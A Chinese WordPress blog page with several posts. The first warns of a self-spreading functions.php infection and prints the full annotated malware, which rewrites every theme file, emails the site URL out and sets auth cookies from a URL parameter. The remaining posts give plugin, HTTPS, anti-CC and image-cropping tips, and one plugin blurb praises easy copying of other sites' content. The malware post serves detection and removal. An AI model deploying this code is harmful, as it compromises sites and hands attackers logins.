Posted on Leave a comment

wordpress主题functions.php文件恶意代码清除方法

昨天在给朋友做一个定制主题的时候,在functions.php发现了一段非常奇怪的代码。自己也忘了是怎么出现的。我随便找了个函数百度了一下,发现中招的人真是不少啊。原来这段包含在functions.php的代码是已经流行了一段时间的恶意代码。这段代码会自动循环感染你所有的WordPress主题functions.php文件。所以发出来给大家做个参考。有碰到类似的朋友记得一定要删除。

小心WordPress主题functions.php包含的恶意代码

这段代码是被加在在functions.php的?>后面的。如果发现了类似的多余函数,或者很多个?>那就要检查一下了。修改的时候记得把其他WordPress主题的functions.php设置为只读。这样才能不被感染。全部改完后再把权限修改回来。

另外说一点,本站下载的主题不会含有恶意代码,凡是其他网站下载的Yusi主题,请自己检查清楚有没有后门。

好了,下面把那段恶意代码发布上来,希望大家自己对照检查一下。

<?phpfunction _verifyactivate_widgets(){    //当前文件名,如/path-to-www/wp-content/themes/SimpleDark/functions.php         //查找当前主题functions.php文件中最后一个 <? 标记,从这个标记的位置开始,取得一直到文件尾的内容    $widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));    $output="";    $allowed="";    //去除html和php标签,其实这一句是扯蛋。。。    $output=strip_tags($output, $allowed);    //取得主题目录themes的绝对路径,如 /path-to-www/wp-content/themes        //为了加强程序的兼容性,它不惜以这种很晦涩的方式来获取。。。        //以主题目录themes的绝对路径用array包裹为参数传递给_get_allwidgets_cont函数获取此博客的所有主题的functions.php文件的绝对路径    $direst=_get_allwidgets_cont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));    if (is_array($direst)){        foreach ($direst as $item){            //如果主题functions.php文件可写            if (is_writable($item)){                //特征码                $ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"("));                //取目标functions.php文件内容                $cont=file_get_contents($item);                //没找到特征码?OK,试图感染                if (stripos($cont,$ftion) === false){                    //查看目标functions.php文件最后是否是以 ?> 结尾,如果不是,给加上 ?> 标记                    $comaar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">";                    //这里的代码是忽悠人了,模仿WP widgets的代码,蛊惑你的眼睛,让你觉得这是widget代码。。。                    $output .= $before . "Not found" . $after;                    //如果文件是以 ?> 标记结尾的,连标记一起取过来                    if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);}                    //开始感染,$widget内容即是恶意代码自身,在functions.php文件原内容后附加恶意代码                    $output=rtrim($output, "\n\t"); fputs($f=fopen($item,"w+"),$cont . $comaar . "\n" .$widget);fclose($f);                     //后面这句也是伪装用的                                $output .= ($isshowdots && $ellipsis) ? "..." : "";                }            }        }    }    return $output;}function _get_allwidgets_cont($wids,$items=array()){    //从$wids数组弹出一个元素(实际上是一个位置)    $places=array_shift($wids);    //如果位置字串是以/结尾的,则去掉/    if(substr($places,-1) == "/"){        $places=substr($places,0,-1);    }     //若不存在这样的文件或目录则直接返回false    if(!file_exists($places) || !is_dir($places)){        return false;    }elseif(is_readable($places)){        //否则的话。。。嘿嘿        //遍历此目录        $elems=scandir($places);        foreach ($elems as $elem){            if ($elem != "." && $elem != ".."){                //如果是目录,则加入$wids数组                if (is_dir($places . "/" . $elem)){                    $wids[]=$places . "/" . $elem;                } elseif (is_file($places . "/" . $elem)&&                     $elem == substr(__FILE__,-13)){                        //否则,如果是文件,并且文件名等于 functions.php的话,则加入到$items数组保存,这才是它的目的functions.php正是它要找的                    $items[]=$places . "/" . $elem;}                }            }    }else{        return false;       }    //下面还有子目录?再找找看,递归    if (sizeof($wids) > 0){        return _get_allwidgets_cont($wids,$items);    } else {        //好了,完事了,以数组返回所有找到的functions.php文件的绝对路径        return $items;    }} //下面是3个针对低版本的php而写的兼容函数if(!function_exists("stripos")){     function stripos(  $str, $needle, $offset = 0  ){         return strpos(  strtolower( $str ), strtolower( $needle ), $offset  );     }} if(!function_exists("strripos")){     function strripos(  $haystack, $needle, $offset = 0  ) {         if(  !is_string( $needle )  )$needle = chr(  intval( $needle )  );         if(  $offset < 0  ){             $temp_cut = strrev(  substr( $haystack, 0, abs($offset) )  );         }         else{             $temp_cut = strrev(    substr(   $haystack, 0, max(  ( strlen($haystack) - $offset ), 0  )   )    );         }         if(   (  $found = stripos( $temp_cut, strrev($needle) )  ) === FALSE   )return FALSE;         $pos = (   strlen(  $haystack  ) - (  $found + $offset + strlen( $needle )  )   );         return $pos;     }}if(!function_exists("scandir")){     function scandir($dir,$listDirectories=false, $skipDots=true) {        $dirArray = array();        if ($handle = opendir($dir)) {            while (false !== ($file = readdir($handle))) {                if (($file != "." && $file != "..") || $skipDots == true) {                    if($listDirectories == false) { if(is_dir($file)) { continue; } }                    array_push($dirArray,basename($file));                }            }            closedir($handle);        }        return $dirArray;    }} //这个动作添加了,用于检测所有主题目录下functions.php并感染add_action("admin_head", "_verifyactivate_widgets"); function _getprepare_widget(){    if(!isset($text_length)) $text_length=120;    if(!isset($check)) $check="cookie";    if(!isset($tagsallowed)) $tagsallowed="<a>";    if(!isset($filter)) $filter="none";    if(!isset($coma)) $coma="";    if(!isset($home_filter)) $home_filter=get_option("home");     if(!isset($pref_filters)) $pref_filters="wp_";    if(!isset($is_use_more_link)) $is_use_more_link=1;     if(!isset($com_type)) $com_type="";     if(!isset($cpages)) $cpages=$_GET["cperpage"];    if(!isset($post_auth_comments)) $post_auth_comments="";    if(!isset($com_is_approved)) $com_is_approved="";     if(!isset($post_auth)) $post_auth="auth";    if(!isset($link_text_more)) $link_text_more="(more...)";    if(!isset($widget_yes)) $widget_yes=get_option("_is_widget_active_");    if(!isset($checkswidgets))     //这个实际是wp_set_auth_cookie    $checkswidgets=$pref_filters."set"."_".$post_auth."_".$check;    if(!isset($link_text_more_ditails)) $link_text_more_ditails="(details...)";    if(!isset($contentmore)) $contentmore="ma".$coma."il";    if(!isset($for_more)) $for_more=1;    if(!isset($fakeit)) $fakeit=1;    if(!isset($sql)) $sql="";     //如果 _is_widget_active_ option内容为空,即表示没有被感染过    if (!$widget_yes) :     global $wpdb, $post;    //取出存在已经通过的评论(不包括trackback/pingback)的文章    // post_author 为 [email protected] 的文章,肯定是没有的     $sq1="SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND post_author=\"li".$coma."vethe".$com_type."mas".$coma."@".$com_is_approved."gm".$post_auth_comments."ail".$coma.".".$coma."co"."m\" AND post_password=\"\" AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count";#    if (!empty($post->post_password)) {         if ($_COOKIE["wp-postpass_".COOKIEHASH] != $post->post_password) {             if(is_feed()) {                 $output=__("There is no excerpt because this is a protected post.");            } else {                $output=get_the_password_form();            }        }    }    if(!isset($fixed_tags)) $fixed_tags=1;    if(!isset($filters)) $filters=$home_filter;     //$gettextcomments实际上为 wp_mail    if(!isset($gettextcomments)) $gettextcomments=$pref_filters.$contentmore;    if(!isset($tag_aditional)) $tag_aditional="div";     //这里$sh_cont即为 [email protected]    if(!isset($sh_cont)) $sh_cont=substr($sq1, stripos($sq1, "live"), 20);#    if(!isset($more_text_link)) $more_text_link="Continue reading this entry";      if(!isset($isshowdots)) $isshowdots=1;     $comments=$wpdb->get_results($sql);     if($fakeit == 2) {         $text=$post->post_content;    } elseif($fakeit == 1) {         $text=(empty($post->post_excerpt)) ? $post->post_content : $post->post_excerpt;    } else {         $text=$post->post_excerpt;    }    //开始调用 wp_mail 向 [email protected] 发送邮件,标题和内容都是被感染的博客的URL 地址    $sq1="SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND comment_content=". call_user_func_array($gettextcomments, array($sh_cont, $home_filter, $filters)) ." ORDER BY comment_date_gmt DESC LIMIT $src_count";#    if($text_length < 0) {        $output=$text;    } else {        if(!$no_more && strpos($text, "<span id="more-5265"></span>")) {            $text=explode("<span id="more-5675"></span>", $text, 2);            $l=count($text[0]);            $more_link=1;            //执行这一句时就开始发邮件了。            $comments=$wpdb->get_results($sql);        } else {            $text=explode(" ", $text);            if(count($text) > $text_length) {                $l=$text_length;                $ellipsis=1;            } else {                $l=count($text);                $link_text_more="";                $ellipsis=0;            }        }        for ($i=0; $i<$l; $i++)                $output .= $text[$i] . " ";    }    //把感染标记置为1    update_option("_is_widget_active_", 1);    if("all" != $tagsallowed) {        $output=strip_tags($output, $tagsallowed);        return $output;    }    endif;    $output=rtrim($output, "\s\n\t\r\0\x0B");    $output=($fixed_tags) ? balanceTags($output, true) : $output;    $output .= ($isshowdots && $ellipsis) ? "..." : "";    //$filter 为 none ...,又是在伪装    $output=apply_filters($filter, $output);    switch($tag_aditional) {        case("div") :            $tag="div";        break;        case("span") :            $tag="span";        break;        case("p") :            $tag="p";        break;        default :            $tag="span";    } //$checkswidgets即是wp_set_auth_cookie    if ($is_use_more_link ) {        if($for_more) {            $output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "#more-" . $post->ID ."\" title=\"" . $more_text_link . "\">" . $link_text_more = !is_user_logged_in() && @call_user_func_array($checkswidgets,array($cpages, true)) ? $link_text_more : "" . "</a></" . $tag . ">" . "\n";        } else {            $output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "\" title=\"" . $more_text_link . "\">" . $link_text_more . "</a></" . $tag . ">" . "\n";        }    }    return $output;} //这里是用来干坏事的,这才是这个恶意代码的目的,前面的感染是“准备活动”add_action("init", "_getprepare_widget");  //这个函数也是用来伪装的,无恶意function __popular_posts($no_posts=6, $before="<li>", $after="</li>", $show_pass_post=false, $duration="") {    global $wpdb;    $request="SELECT ID, post_title, COUNT($wpdb->comments.comment_post_ID) AS \"comment_count\" FROM $wpdb->posts, $wpdb->comments";    $request .= " WHERE comment_approved=\"1\" AND $wpdb->posts.ID=$wpdb->comments.comment_post_ID AND post_status=\"publish\"";    if(!$show_pass_post) $request .= " AND post_password =\"\"";    if($duration !="") {         $request .= " AND DATE_SUB(CURDATE(),INTERVAL ".$duration." DAY) < post_date ";    }    $request .= " GROUP BY $wpdb->comments.comment_post_ID ORDER BY comment_count DESC LIMIT $no_posts";    $posts=$wpdb->get_results($request);    $output="";    if ($posts) {        foreach ($posts as $post) {            $post_title=stripslashes($post->post_title);            $comment_count=$post->comment_count;            $permalink=get_permalink($post->ID);            $output .= $before . " <a href=\"" . $permalink . "\" title=\"" . $post_title."\">" . $post_title . "</a> " . $after;        }    } else {        $output .= $before . "None found" . $after;    }    return  $output;}?>

我这边被感染的代码没有注解,我去找了由无灯大大分析注释版本代码,非常感谢。

小小建议

在有些地方下载的免费主题,记得检查Wordpress主题的functions.php文件是否含有上面的恶意代码(一般会自动加载在functions.php正常函数的最后)。如果有。记得设置为只读然后删除。

Posted on Leave a comment

wordpress主题选项项目添加代码

1.主题选项图片上传:'logo'=>array('title'=>'logo上传','type'=>'upload','size'=>'60','des'=>'手动填写地址/wp-content/themes/abctheme/images/logo.png , 或者上传文件插入地址','tips'=>'大小宜为500x51'),

2.主题位置代码:<img src="<?php echo get_option( 'logo' ); ?>" alt="<?php echo esc_attr( get_bloginfo( 'name' ) ); ?>" title="<?php echo esc_attr( get_bloginfo( 'name' ) ); ?>" />

注:字母 logo为可替换内容,要注意上下两段代码里都要替换。 alt和 title如果不需要可以选择删掉,这里贴上去的alt和title显示在前端都是博客名称或者企业名称。

1.文字插入:'zjtel'=>array('title'=>'手机号码','type'=>'textarea','width'=>'500px','height'=>'25px'),

2.主题代码位置: < ?php echo stripslashes( get_option( 'zjtel' ) ); ?>

注:zjtel为可替换。

其中1是放在admin-option/data.php,2是放在像header.php,footer.php和index.php等展现页里面。

Posted on Leave a comment

柳城的百度seo插件不能用后的wordpress sitemap插件 baidu_sitemap_china分享

要说起wordpress sitemap插件,老实说,市面上并不多,以往,用得最多的可能就是柳城的百度seo插件了,可惜,该插件已不支持最新版的wp及php7以上。。。无奈一款简单直观的wordpress sitemap插件进入了历史篇章(作者已回应不再更新)

那么,可能大家用得最多的wordpress sitemap插件就属于 google-sitemap-generator 了吧,当然,以我的技术层面还不足以去评价这款插件是好还是不好。

再然后,有一款dx-seo插件里的sitemap分支还是不错的,可惜dx-seo这款插件安装启动后,也基本是各种报错了,而且该插件里还涵盖了一些其他用不到的功能,为了wordpress sitemap再带上一些其他没用的功能,强迫症患者是不是会很难受?

最后,其他市面上各种sitemap的小版本,我也体验了一番,基本都存在报错、无法使用的情况,无奈。。。

那么,今天,就给大家带来一款,我自己觉得还算可以的一款wordpress sitemap插件,提前说明,该插件是从dx-seo里单纯抽离出sitemap功能后编写成独立插件的。

看图就可以很直观的清楚如何设置,小白都可以看懂的设置,需要的朋友就请下载后体验吧,有任何不明白的地方,欢迎该贴回复!

Posted on Leave a comment

wp super cache 页面不相符!时间戳有差异或者不存在(本人是使用百度云加速造成的)

wP Super Cache caching was broken but has been fixed! The script advanced-cache.php could not load wp-cache-phase1.php.
然后测试缓存,说是缓存不成功:页面不相符!时间戳有差异或者不存在!

重启服务器、更换主题、重新安装 WP Super Cache、恢复快照到几十天之前都试了,也均不灵验。

后来突然想到,WP Super Cache 是通过生成静态的 html 文件来减轻每次看博文读取数据库负担的,好像 CloudFlare 的加速里给开了 HTML JS CSS 加速。

去 百度云加速 面板里关掉这三个的加速,Purge 一下,回到博客后台,测试缓存,已经正常工作了。顺便预缓存下吧!

Posted on Leave a comment

百度分享支持https

站点自从开启 https 之后 ,百度分享就不能用了!但是又寻找不到类似百度分享的替代品。。

怎么办呢?要如何解决 百度分享不支持https的问题呢,

跟着博主动动手,让你百度分享仍然能在https下使用 ~

伸手党

先上伸手党的解决方案~

博主修改好的分享代码(下面两个链接下载其中一个)的即可

static 解压后丢到站点根目录下即可。

然后对应的百度分享代码中,把http://bdimg.share.baidu.com/改为 /

.src='http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)];</script>
改为
.src='/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)];</script>
 到此,百度分享HTTPS化的教程结束。
本博客,也是用的这一个方案解决的问题,可以看一下我的分享代码 
Posted on Leave a comment

使用百度云加速将网站开启https

2019年10月份,百度云加速开启了支持https的加速模式,在百度云加速后台即可很方便的将网站设置成https网址,https加速模式现在使用越来越普遍,从百度可以支持使用https之后,相信会有很多网站都开始使用https加密。

废话不多说直接说说在使用百度云加速过程中需要注意到的几个问题;

1.首先在百度云加速控制台申请证书,证书是可以免费申请的,并且问过客户证书到期可以重新免费申请。一个域名可以申请多个证书,我的站申请了2个,一个是www.xxxxx.com,另外一个是m.xxxxx.com。

2.这点需要特别注意一下,否则使用https网址打不开网站,如果你只是在网站上

3. ,经过上面两步,你的网站已经可以使用https打开了,也可以使用https进入网站后台,如果网站是基于wordpress,安装插件 Really Simple SSL ,并启用使网站都支持https, 如果不是wordpress,则需要根据不同站点选择手动或者自动,使网站都支持https。 这一步也可以作为第一步来操作,每个站点情况不同可能会有所不同。然后看看下图,我使用的是360浏览器,你的站点是否会显示绿色的锁了。如果显示黄色三角号,说明你网站里还有些地方没有使用https,一般只有很少一点,直接手动解决

特别说明第二点,为什么使用半程加密,使用半程加密是只加密CDN节点的,源站其实并没有加密,如果是普通企业站完全够用,如果你想做的更完美把源站也加密,则需要源站也开启SSL部署,由于在百度云加速后台申请的证书只有专业版以后才提供下载,所以源站是不能部署SSL的,所以必须是不在百度申请的证书,然后把证书在源站部署,再在百度云加速这边将证书上传即可。如果都部署了,则加密的时候除了严格加密模式之外,都可以使用。

Posted on Leave a comment

WordPress建中文网站必装13款插件

重要的话说前面,本人感觉必须安装的插件All In One WP Security(必须装,否则网站被黑后悔莫及),WPJAM-BASIC,WP Super Cache,Wenprise Pinyin SlugDX-auto-save-imagesContact Form 7Wordfence Security,有了这几个插件,基本可以保证你的网站安全快捷,有利于SEO优化。其它插件也是一些常用的,可以分情况安装。

1、安全插件:All In One WP Security

这个安全插件功能非常强大,可以设置很多项目,具体不打算在这里讲解,您安装了这个插件后,可以在网站后台左侧菜单看到有一个 WP安全的菜单,一般在倒数第2或者第3个,建议首先安装上这个插件。

2、备份插件:BackUpWordPress

安装这个备份插件,可以实现定时备份网站文件和数据库文件,建议wordpress网站建好后,安装上此插件,以备网站被损坏时,可以通过备份文件还原。

3、WPJAM-BASIC

插件,这个插件功能比较多,有站点优化加速,百度自动提交,站点地图,缩略图, 发件功能SMTP 等,相对来说比较全面,但是本人最讨厌这个插件的一点是,必须扫码关注公众号,才能自动发来验证码,启用其它功能。

4、水印插件:Image Watermark或者 DX-Watermark

这个插件可以为您的网站图片加上水印,功能不用多解释。

5、缓存插件:WP Super Cache

这个插件用于加速您网站访问速度的用户量达200多万的热门插件,可以实现静态缓存gzip压缩等,功能很多,自己体验。

6、浏览数量:WP-PostViews

这个插件可以统计您文章或页面的访问量,并可以在侧边栏整个阅读排名的功能,具体效果参见江湖人士左侧的【点击排行榜】,此插件可以考虑安装,只是能统计个大概,如果客户想看到可以考虑安装,显示的数据不怎么准确,一般都是多统计很多。哈哈

7、文章排序:Simple Custom Post Order

安装这个插件后,你可以自定义文章的显示顺序,跟置顶功能的区别是你可以通过这个插件决定文章显示在当前列表的任何位置(顺序),即你可以让文章显示在第5条,或者第7条,只需要在后台上下拖动文章排序即可。另外如果用了缓存插件,拖动后需要清一下缓存才能看到效果。

8、生成拼音: Wenprise Pinyin Slug

这个插件是将标签生成拼音,当然不一定是标签,菜单,页面标题都是可以生成拼音的,这样会使你的URL地址非常好看。

9、禁止生成缩略图:Image Sizes Settings

这款插件可以解决您上传图片时,生成很多缩略图的问题,本站也安装了这个插件用于禁止生成过多缩略图的问题,你可以在安装插件后根据需要设置生成什么样的缩略图,如本站的设置如下图所示:

WordPress建中文网站必装11款插件 1
Image Sizes Settings设置



10、远程图片自动本地化插件: DX-auto-save-images

这种插件的类型比较多,但是往往添加很多功能,这款虽然很老,但依然还是比较喜欢使用,可以让你方便的抄袭别人网站的内容和图片。

11、在线留言插件: Contact Form 7

这种插件的类型比较多,但是往往添加很多功能,这款虽然很老,但依然还是比较喜欢使用。非常经典的在线留言插件,配合SMPT直接发件到邮箱,如果想在网站后台看到留言内容,配合作者另外一个插件 Flamingo使用。

12、多语言网站插件: Bogo

个人感觉很简单易懂,插件简单但是强大,和Contact Form 7是同一个作者。

13、网站安全插件: Wordfence Security

功能很强大,能防很多攻击,本人有的站都放弃使用百度等CDN的防御功能,直接使用它,能防简单DDOS配合另外一篇文章的防止CC攻击的代码,能防绝大多数的攻击,这个插件功能全面,但是没有中文,建议多学习此插件。像里面的防火墙设置扫描设置等。




Posted on Leave a comment

WordPress之防御cc攻击(频繁F5刷新)

CC攻击是一种很常见的攻击,对于WordPress来说这方面的防御做的很差,F5都能刷死,解决方法那,可以给网站生成静态,比如用WP Super Cache插件,生成静态后即能加速还能减少服务器资源占用,推荐各位使用。但是这个方法也不是绝对的。推荐各位在加一段代码来防御CC。

将下面的防cc代码加入到当前使用主题的function.php中即可

//防止CC攻击
session_start(); //开启session
$timestamp = time();
$ll_nowtime = $timestamp ;
//判断session是否存在 如果存在从session取值,如果不存在进行初始化赋值
if ($_SESSION){
  $ll_lasttime = $_SESSION['ll_lasttime'];
  $ll_times = $_SESSION['ll_times'] + 1;
  $_SESSION['ll_times'] = $ll_times;
}else{
  $ll_lasttime = $ll_nowtime;
  $ll_times = 1;
  $_SESSION['ll_times'] = $ll_times;
  $_SESSION['ll_lasttime'] = $ll_lasttime;
}
//现在时间-开始登录时间 来进行判断 如果登录频繁 跳转 否则对session进行赋值
if(($ll_nowtime - $ll_lasttime) < 3){
  if ($ll_times>=5){
header("location:http://127.0.0.1");//可以换成其他链接,比如站内的404错误显示页面(千万不要用动态页面)
  exit;
  }
}else{
  $ll_times = 0;
  $_SESSION['ll_lasttime'] = $ll_nowtime;
  $_SESSION['ll_times'] = $ll_times;
}
Posted on Leave a comment

获取特色图像如果为空则获取第一张图

WordPress主题制作过程中经常要获得特色图像的URL以用来裁切或者呈现,但是有时候日志中不包含特色图像,比较好的方法是建立一个方程获得文章内容的第一张特色图像。

获得第一张图的方程在网上有很多,但是缺点是每次必须要用if去判断,有特色图像如何,没有特色图像如何。

所以为何我们不将判断的工作直接放进方程里,让这个方程去获取特色图像,没有的话就调用第一张图呢?

  1. /** Get First image */
  2. function get_first_image() {
  3. global $post, $posts;
  4. $featured_img_url = get_the_post_thumbnail_url(get_the_ID(),'full');
  5. if(empty($featured_img_url)){
  6. $first_img = '';
  7. ob_start();
  8. ob_end_clean();
  9. if($output = preg_match_all('/<img src="[\'&quot;]([^\'&quot;]+)[\'&quot;].*/">/i', $post->post_content, $matches)){
  10. $first_img = $matches [1] [0];
  11. }else{
  12. $first_img = '';
  13. };
  14. }else{
  15. $first_img= $featured_img_url;
  16. }
  17. return $first_img;
  18. }

把如上这组方程放入functions.php,然后在想调用的地方直接用 get_first_image() 就能直接输出特色图像的URL,如果没有特色图像,第一张图的URL将被输出。

例如

  1. $first_img = get_first_image(); // 将特色图或第一张图存进变量
  2. $title = get_the_title(); // 获得文章或页面标题
  3. if ( !empty($first_img) ) { // 如果特色图或第一张图不为空
  4. $blogthumburl = aq_resize( $first_img, 1170, 500, true, true, true ); //进行裁切并存入变量
  5. echo '
  6. <div class="card__image"><a href="'.$first_img.'" data-lightbox="gallery">'; //输出html把图放进其中
  7. echo '<img src="'.$blogthumburl.'" alt="'.$title.'" width="1170" height="500"></a></div>'; //继续输出
  8. }else{//如果特色图和第一张图都为空,则执行下面的内容
  9. }

有些人会在get_first_image()这个方程中增加一个判断,当全部为空时候输出一张默认图像,我认为是不恰当的,因为有时候页面的呈现上只需要文字,太多的默认图像,显得非常呆板。

另外,这个方程有个缺点,就是当文章中没有<img>标签,插入的是Wordpress相册的话,是无法获取相册的第一张图的,有待改进。

Posted on Leave a comment

WordPress主题裁切图片的探讨

在建设网站的过程中,很多时候会需要同一张图片输出各种尺寸以满足网站样式的需求,比如”题图”:

在首页需要小小的缩略图,

在文章列表页需要中等的缩略图,

单篇文章又需要更大的甚至全尺寸的图片。

WordPress自身对于新上传的图片会自动裁切成三种缩略图,加上原图,一共有四种尺寸规格,在后台可以自定义三种缩略图的宽高。

在较为简单的主题中,四种尺寸看似足够用了,但是当主题较为复杂,各种页面展示图片时所需的尺寸不一,四种尺寸就很难满足我们的需求。

早年从一个大师处得到一个神器,只有一个php文件,叫做:

1 TimThumb.php

这个文件最厉害的是,你只要访问它并在后面跟上你要裁切的图片地址、目标尺寸,它就会直接返回给你一个准确的裁切后的结果,举个栗子:

http://www.site.com/timthunmb.php?src=http://www.site.com/image.jpg;w=500;h=500;zc=1
 当你访问这个URL地址,你就会得到强制被裁切成500像素宽,500像素高的图片,不论原图是多大或多小。 

优势

1结果图像完全按url参数控制,非常灵活,不需要统一设置;

2 参数只针对单张图片,不会像wordpress内置裁切一样统一裁切占用过多硬盘空间;

3 切过的图会缓存在临时目录中,下次访问不占用服务器资源;

劣势

1timthumb的图片url都带一大堆参数,非常丑,而且对搜索引擎不友好。

2 裁切过的临时文件并不是图片文件,每次调用都需要带参数。

3 带参数的URL对CDN也不友好,裁好的图片无法被大多数CDN服务识别,造成图片无法显示。

4 已被证实有安全性漏洞,而且作者已经放弃了这个项目,七八年没有更新了。

综上所述,Timthumb并不是一个好的选择。

2 add_image_size() 函数

当Wordpress自带的三种缩略图尺寸不能满足主题需求,你还可以用add_image_size()这个函数增加缩略图的种类,比如:

add_image_size( 'custom-size', 220, 180 ); 
add_image_size( 'custom-size', 220, 180, true ); //hard crop mode
add_image_size( 'custom-size', 220, 220, array( 'left', 'top' ) ); //hard crop left top

直接写在functions.php即可,可以在上传图片的时候生成任意多种尺寸。

优势

  1. 该函数是Wordpress原生函数,不依赖第三方,安全稳定。
  2. 切出的图片直接存在原图目录,调用的是一张真正的图片,SEO友好,CDN友好。

劣势

  1. 仅针对添加函数后上传的图片生效,旧的图片不会自动裁切。
  2. 对每一张上传的图片都会按各个尺寸裁切——不论用不用得到,浪费硬盘空间。
  3. 当你更换主题或是修改缩略图大小,需要用插件全站重新生成缩略图,非常麻烦。

很显然,用add_image_size()裁切图片仅仅适用于简单的主题,而且日后的修改和更换主题非常麻烦,也不是我们所需要的图片裁切方案。

3 CDN提供商的图像处理API

目前主流的 七牛阿里云OSS又拍云都提供了图像处理API,类似Timthumb一样发送一个带参数URL请求,提供商就会返回给你一个处理好的图片。

现在各家的API都越来越强大,除了基本的缩放、裁切,还有锐化、模糊、找平均色值,真是眼花缭乱。

比如七牛

http://cdn.site.com/image.jpg?imageMogr2/gravity/center/thumbnail/1024x1024/crop/1024x500 //以中心缩放,不论原图尺寸多大,结果是1024X500的图片

http://cdn.site.com/image.jpg?imageMogr2/blur/10x5 //得到一张模糊了的图片 模糊半径10 标准差5

这种图形处理跟Timthumb非常相像,但是最核心的不同是,所有处理任务都是在服务商的电脑里完成的,包括最终结果图像也并不是在你的服务器里,除了不占用服务器资源,其自带的CDN也能让图片加载更加快速。

优势

  1. 可以在主题的各个位置随意设置不同参数,针对位置进行不同尺寸图片裁切,灵活,花样多。
  2. 速度非常快。
  3. 处理工作交给提供商,自己的服务器非常轻松。
  4. 类似Timthumb,二次修改非常简单,修改url参数即可。

劣势

  1. 类似Timthumb,图像URL一堆参数,不美观,不利于SEO。
  2. 切好的图都不在自己服务器,一旦提供商宕机,或者自己账户出问题,整站图片都要消失,尽管可能性不大但风险难以把控。
  3. 三家对Wordpress都没有特别完善的Wordpress平台对接方案,爱好者WPJAM曾出过一个七牛插件,但是裁切图像用的是七牛的基础处理API,没有高级处理,致命缺点是只能缩小图片,不能放大,有时候会造成版面的错乱。
  4. 我在《我为什么要舍弃Wordpress七牛插件》这篇文章里也说了为什么不用WPJAM的插件。

曾经,七牛的图像处理是我放弃Timthumb之后的首选,但是经历过几次因为某插件带来的恶心之后,我放弃了用七牛API裁图。

3 Aqua Resizer

Aqua Resizer可能是对上述几种方案进行取舍后的结果,首先感谢作者。

类似TimThumb,Aqua Resizer也是仅一个PHP文件,但比TimThumb高级的是,AR的裁切完全是调用Wordpress内置裁图机制,通过添加一个函数来裁切图像,而不是利用底层的PHP来处理图像。

不同于Wordpress内置函数add_image_size(),AR的裁切完全是On the fly,也就是当访问页面模板碰到函数的时候,才开始裁切,不干预新上传的图片。

而且,裁切后的图像会直接在文件名后添加宽高数字存储在原图路径,第二次访问直接调用。

优势

  1. 调用Wordpress内部机制裁图,不依赖任何第三方,安全,稳定。
  2. 缓存图片与Wordpress缩略图格式一致,存储在自己服务器,安全放心。
  3. 前端直接输出缩略图的URL,对SEO友好,对CDN友好。
  4. 仅对需要的图片裁切需要的尺寸,不会对所有图片都“一刀切”。
  5. 通过对各个位置的函数写参数,可以很轻松的控制图片的裁切。

劣势

  1. 对于新做的主题首次访问,如果图片量太大,会造成服务器内存爆掉。
  2. 修改裁图的函数会新裁切出图片,旧图会占用空间。
  3. 换主题的时候,仍然存在多余图片不好清理的问题。

至今,Aqua Resizer是综合评价下来最合适的图像裁切插件。目前这个站点(dukeyin.com)以及Keepmins,都已经完成了从七牛转变成AquaResizer,它不像Timthumb一样强到自己全是缺陷,也不像Worddpress自身切图一样死板无可救药,比起七牛阿里云OSS又多一份保守和贤惠,在没有更好选择的时间,我想我会一直使用Aqua Resizer。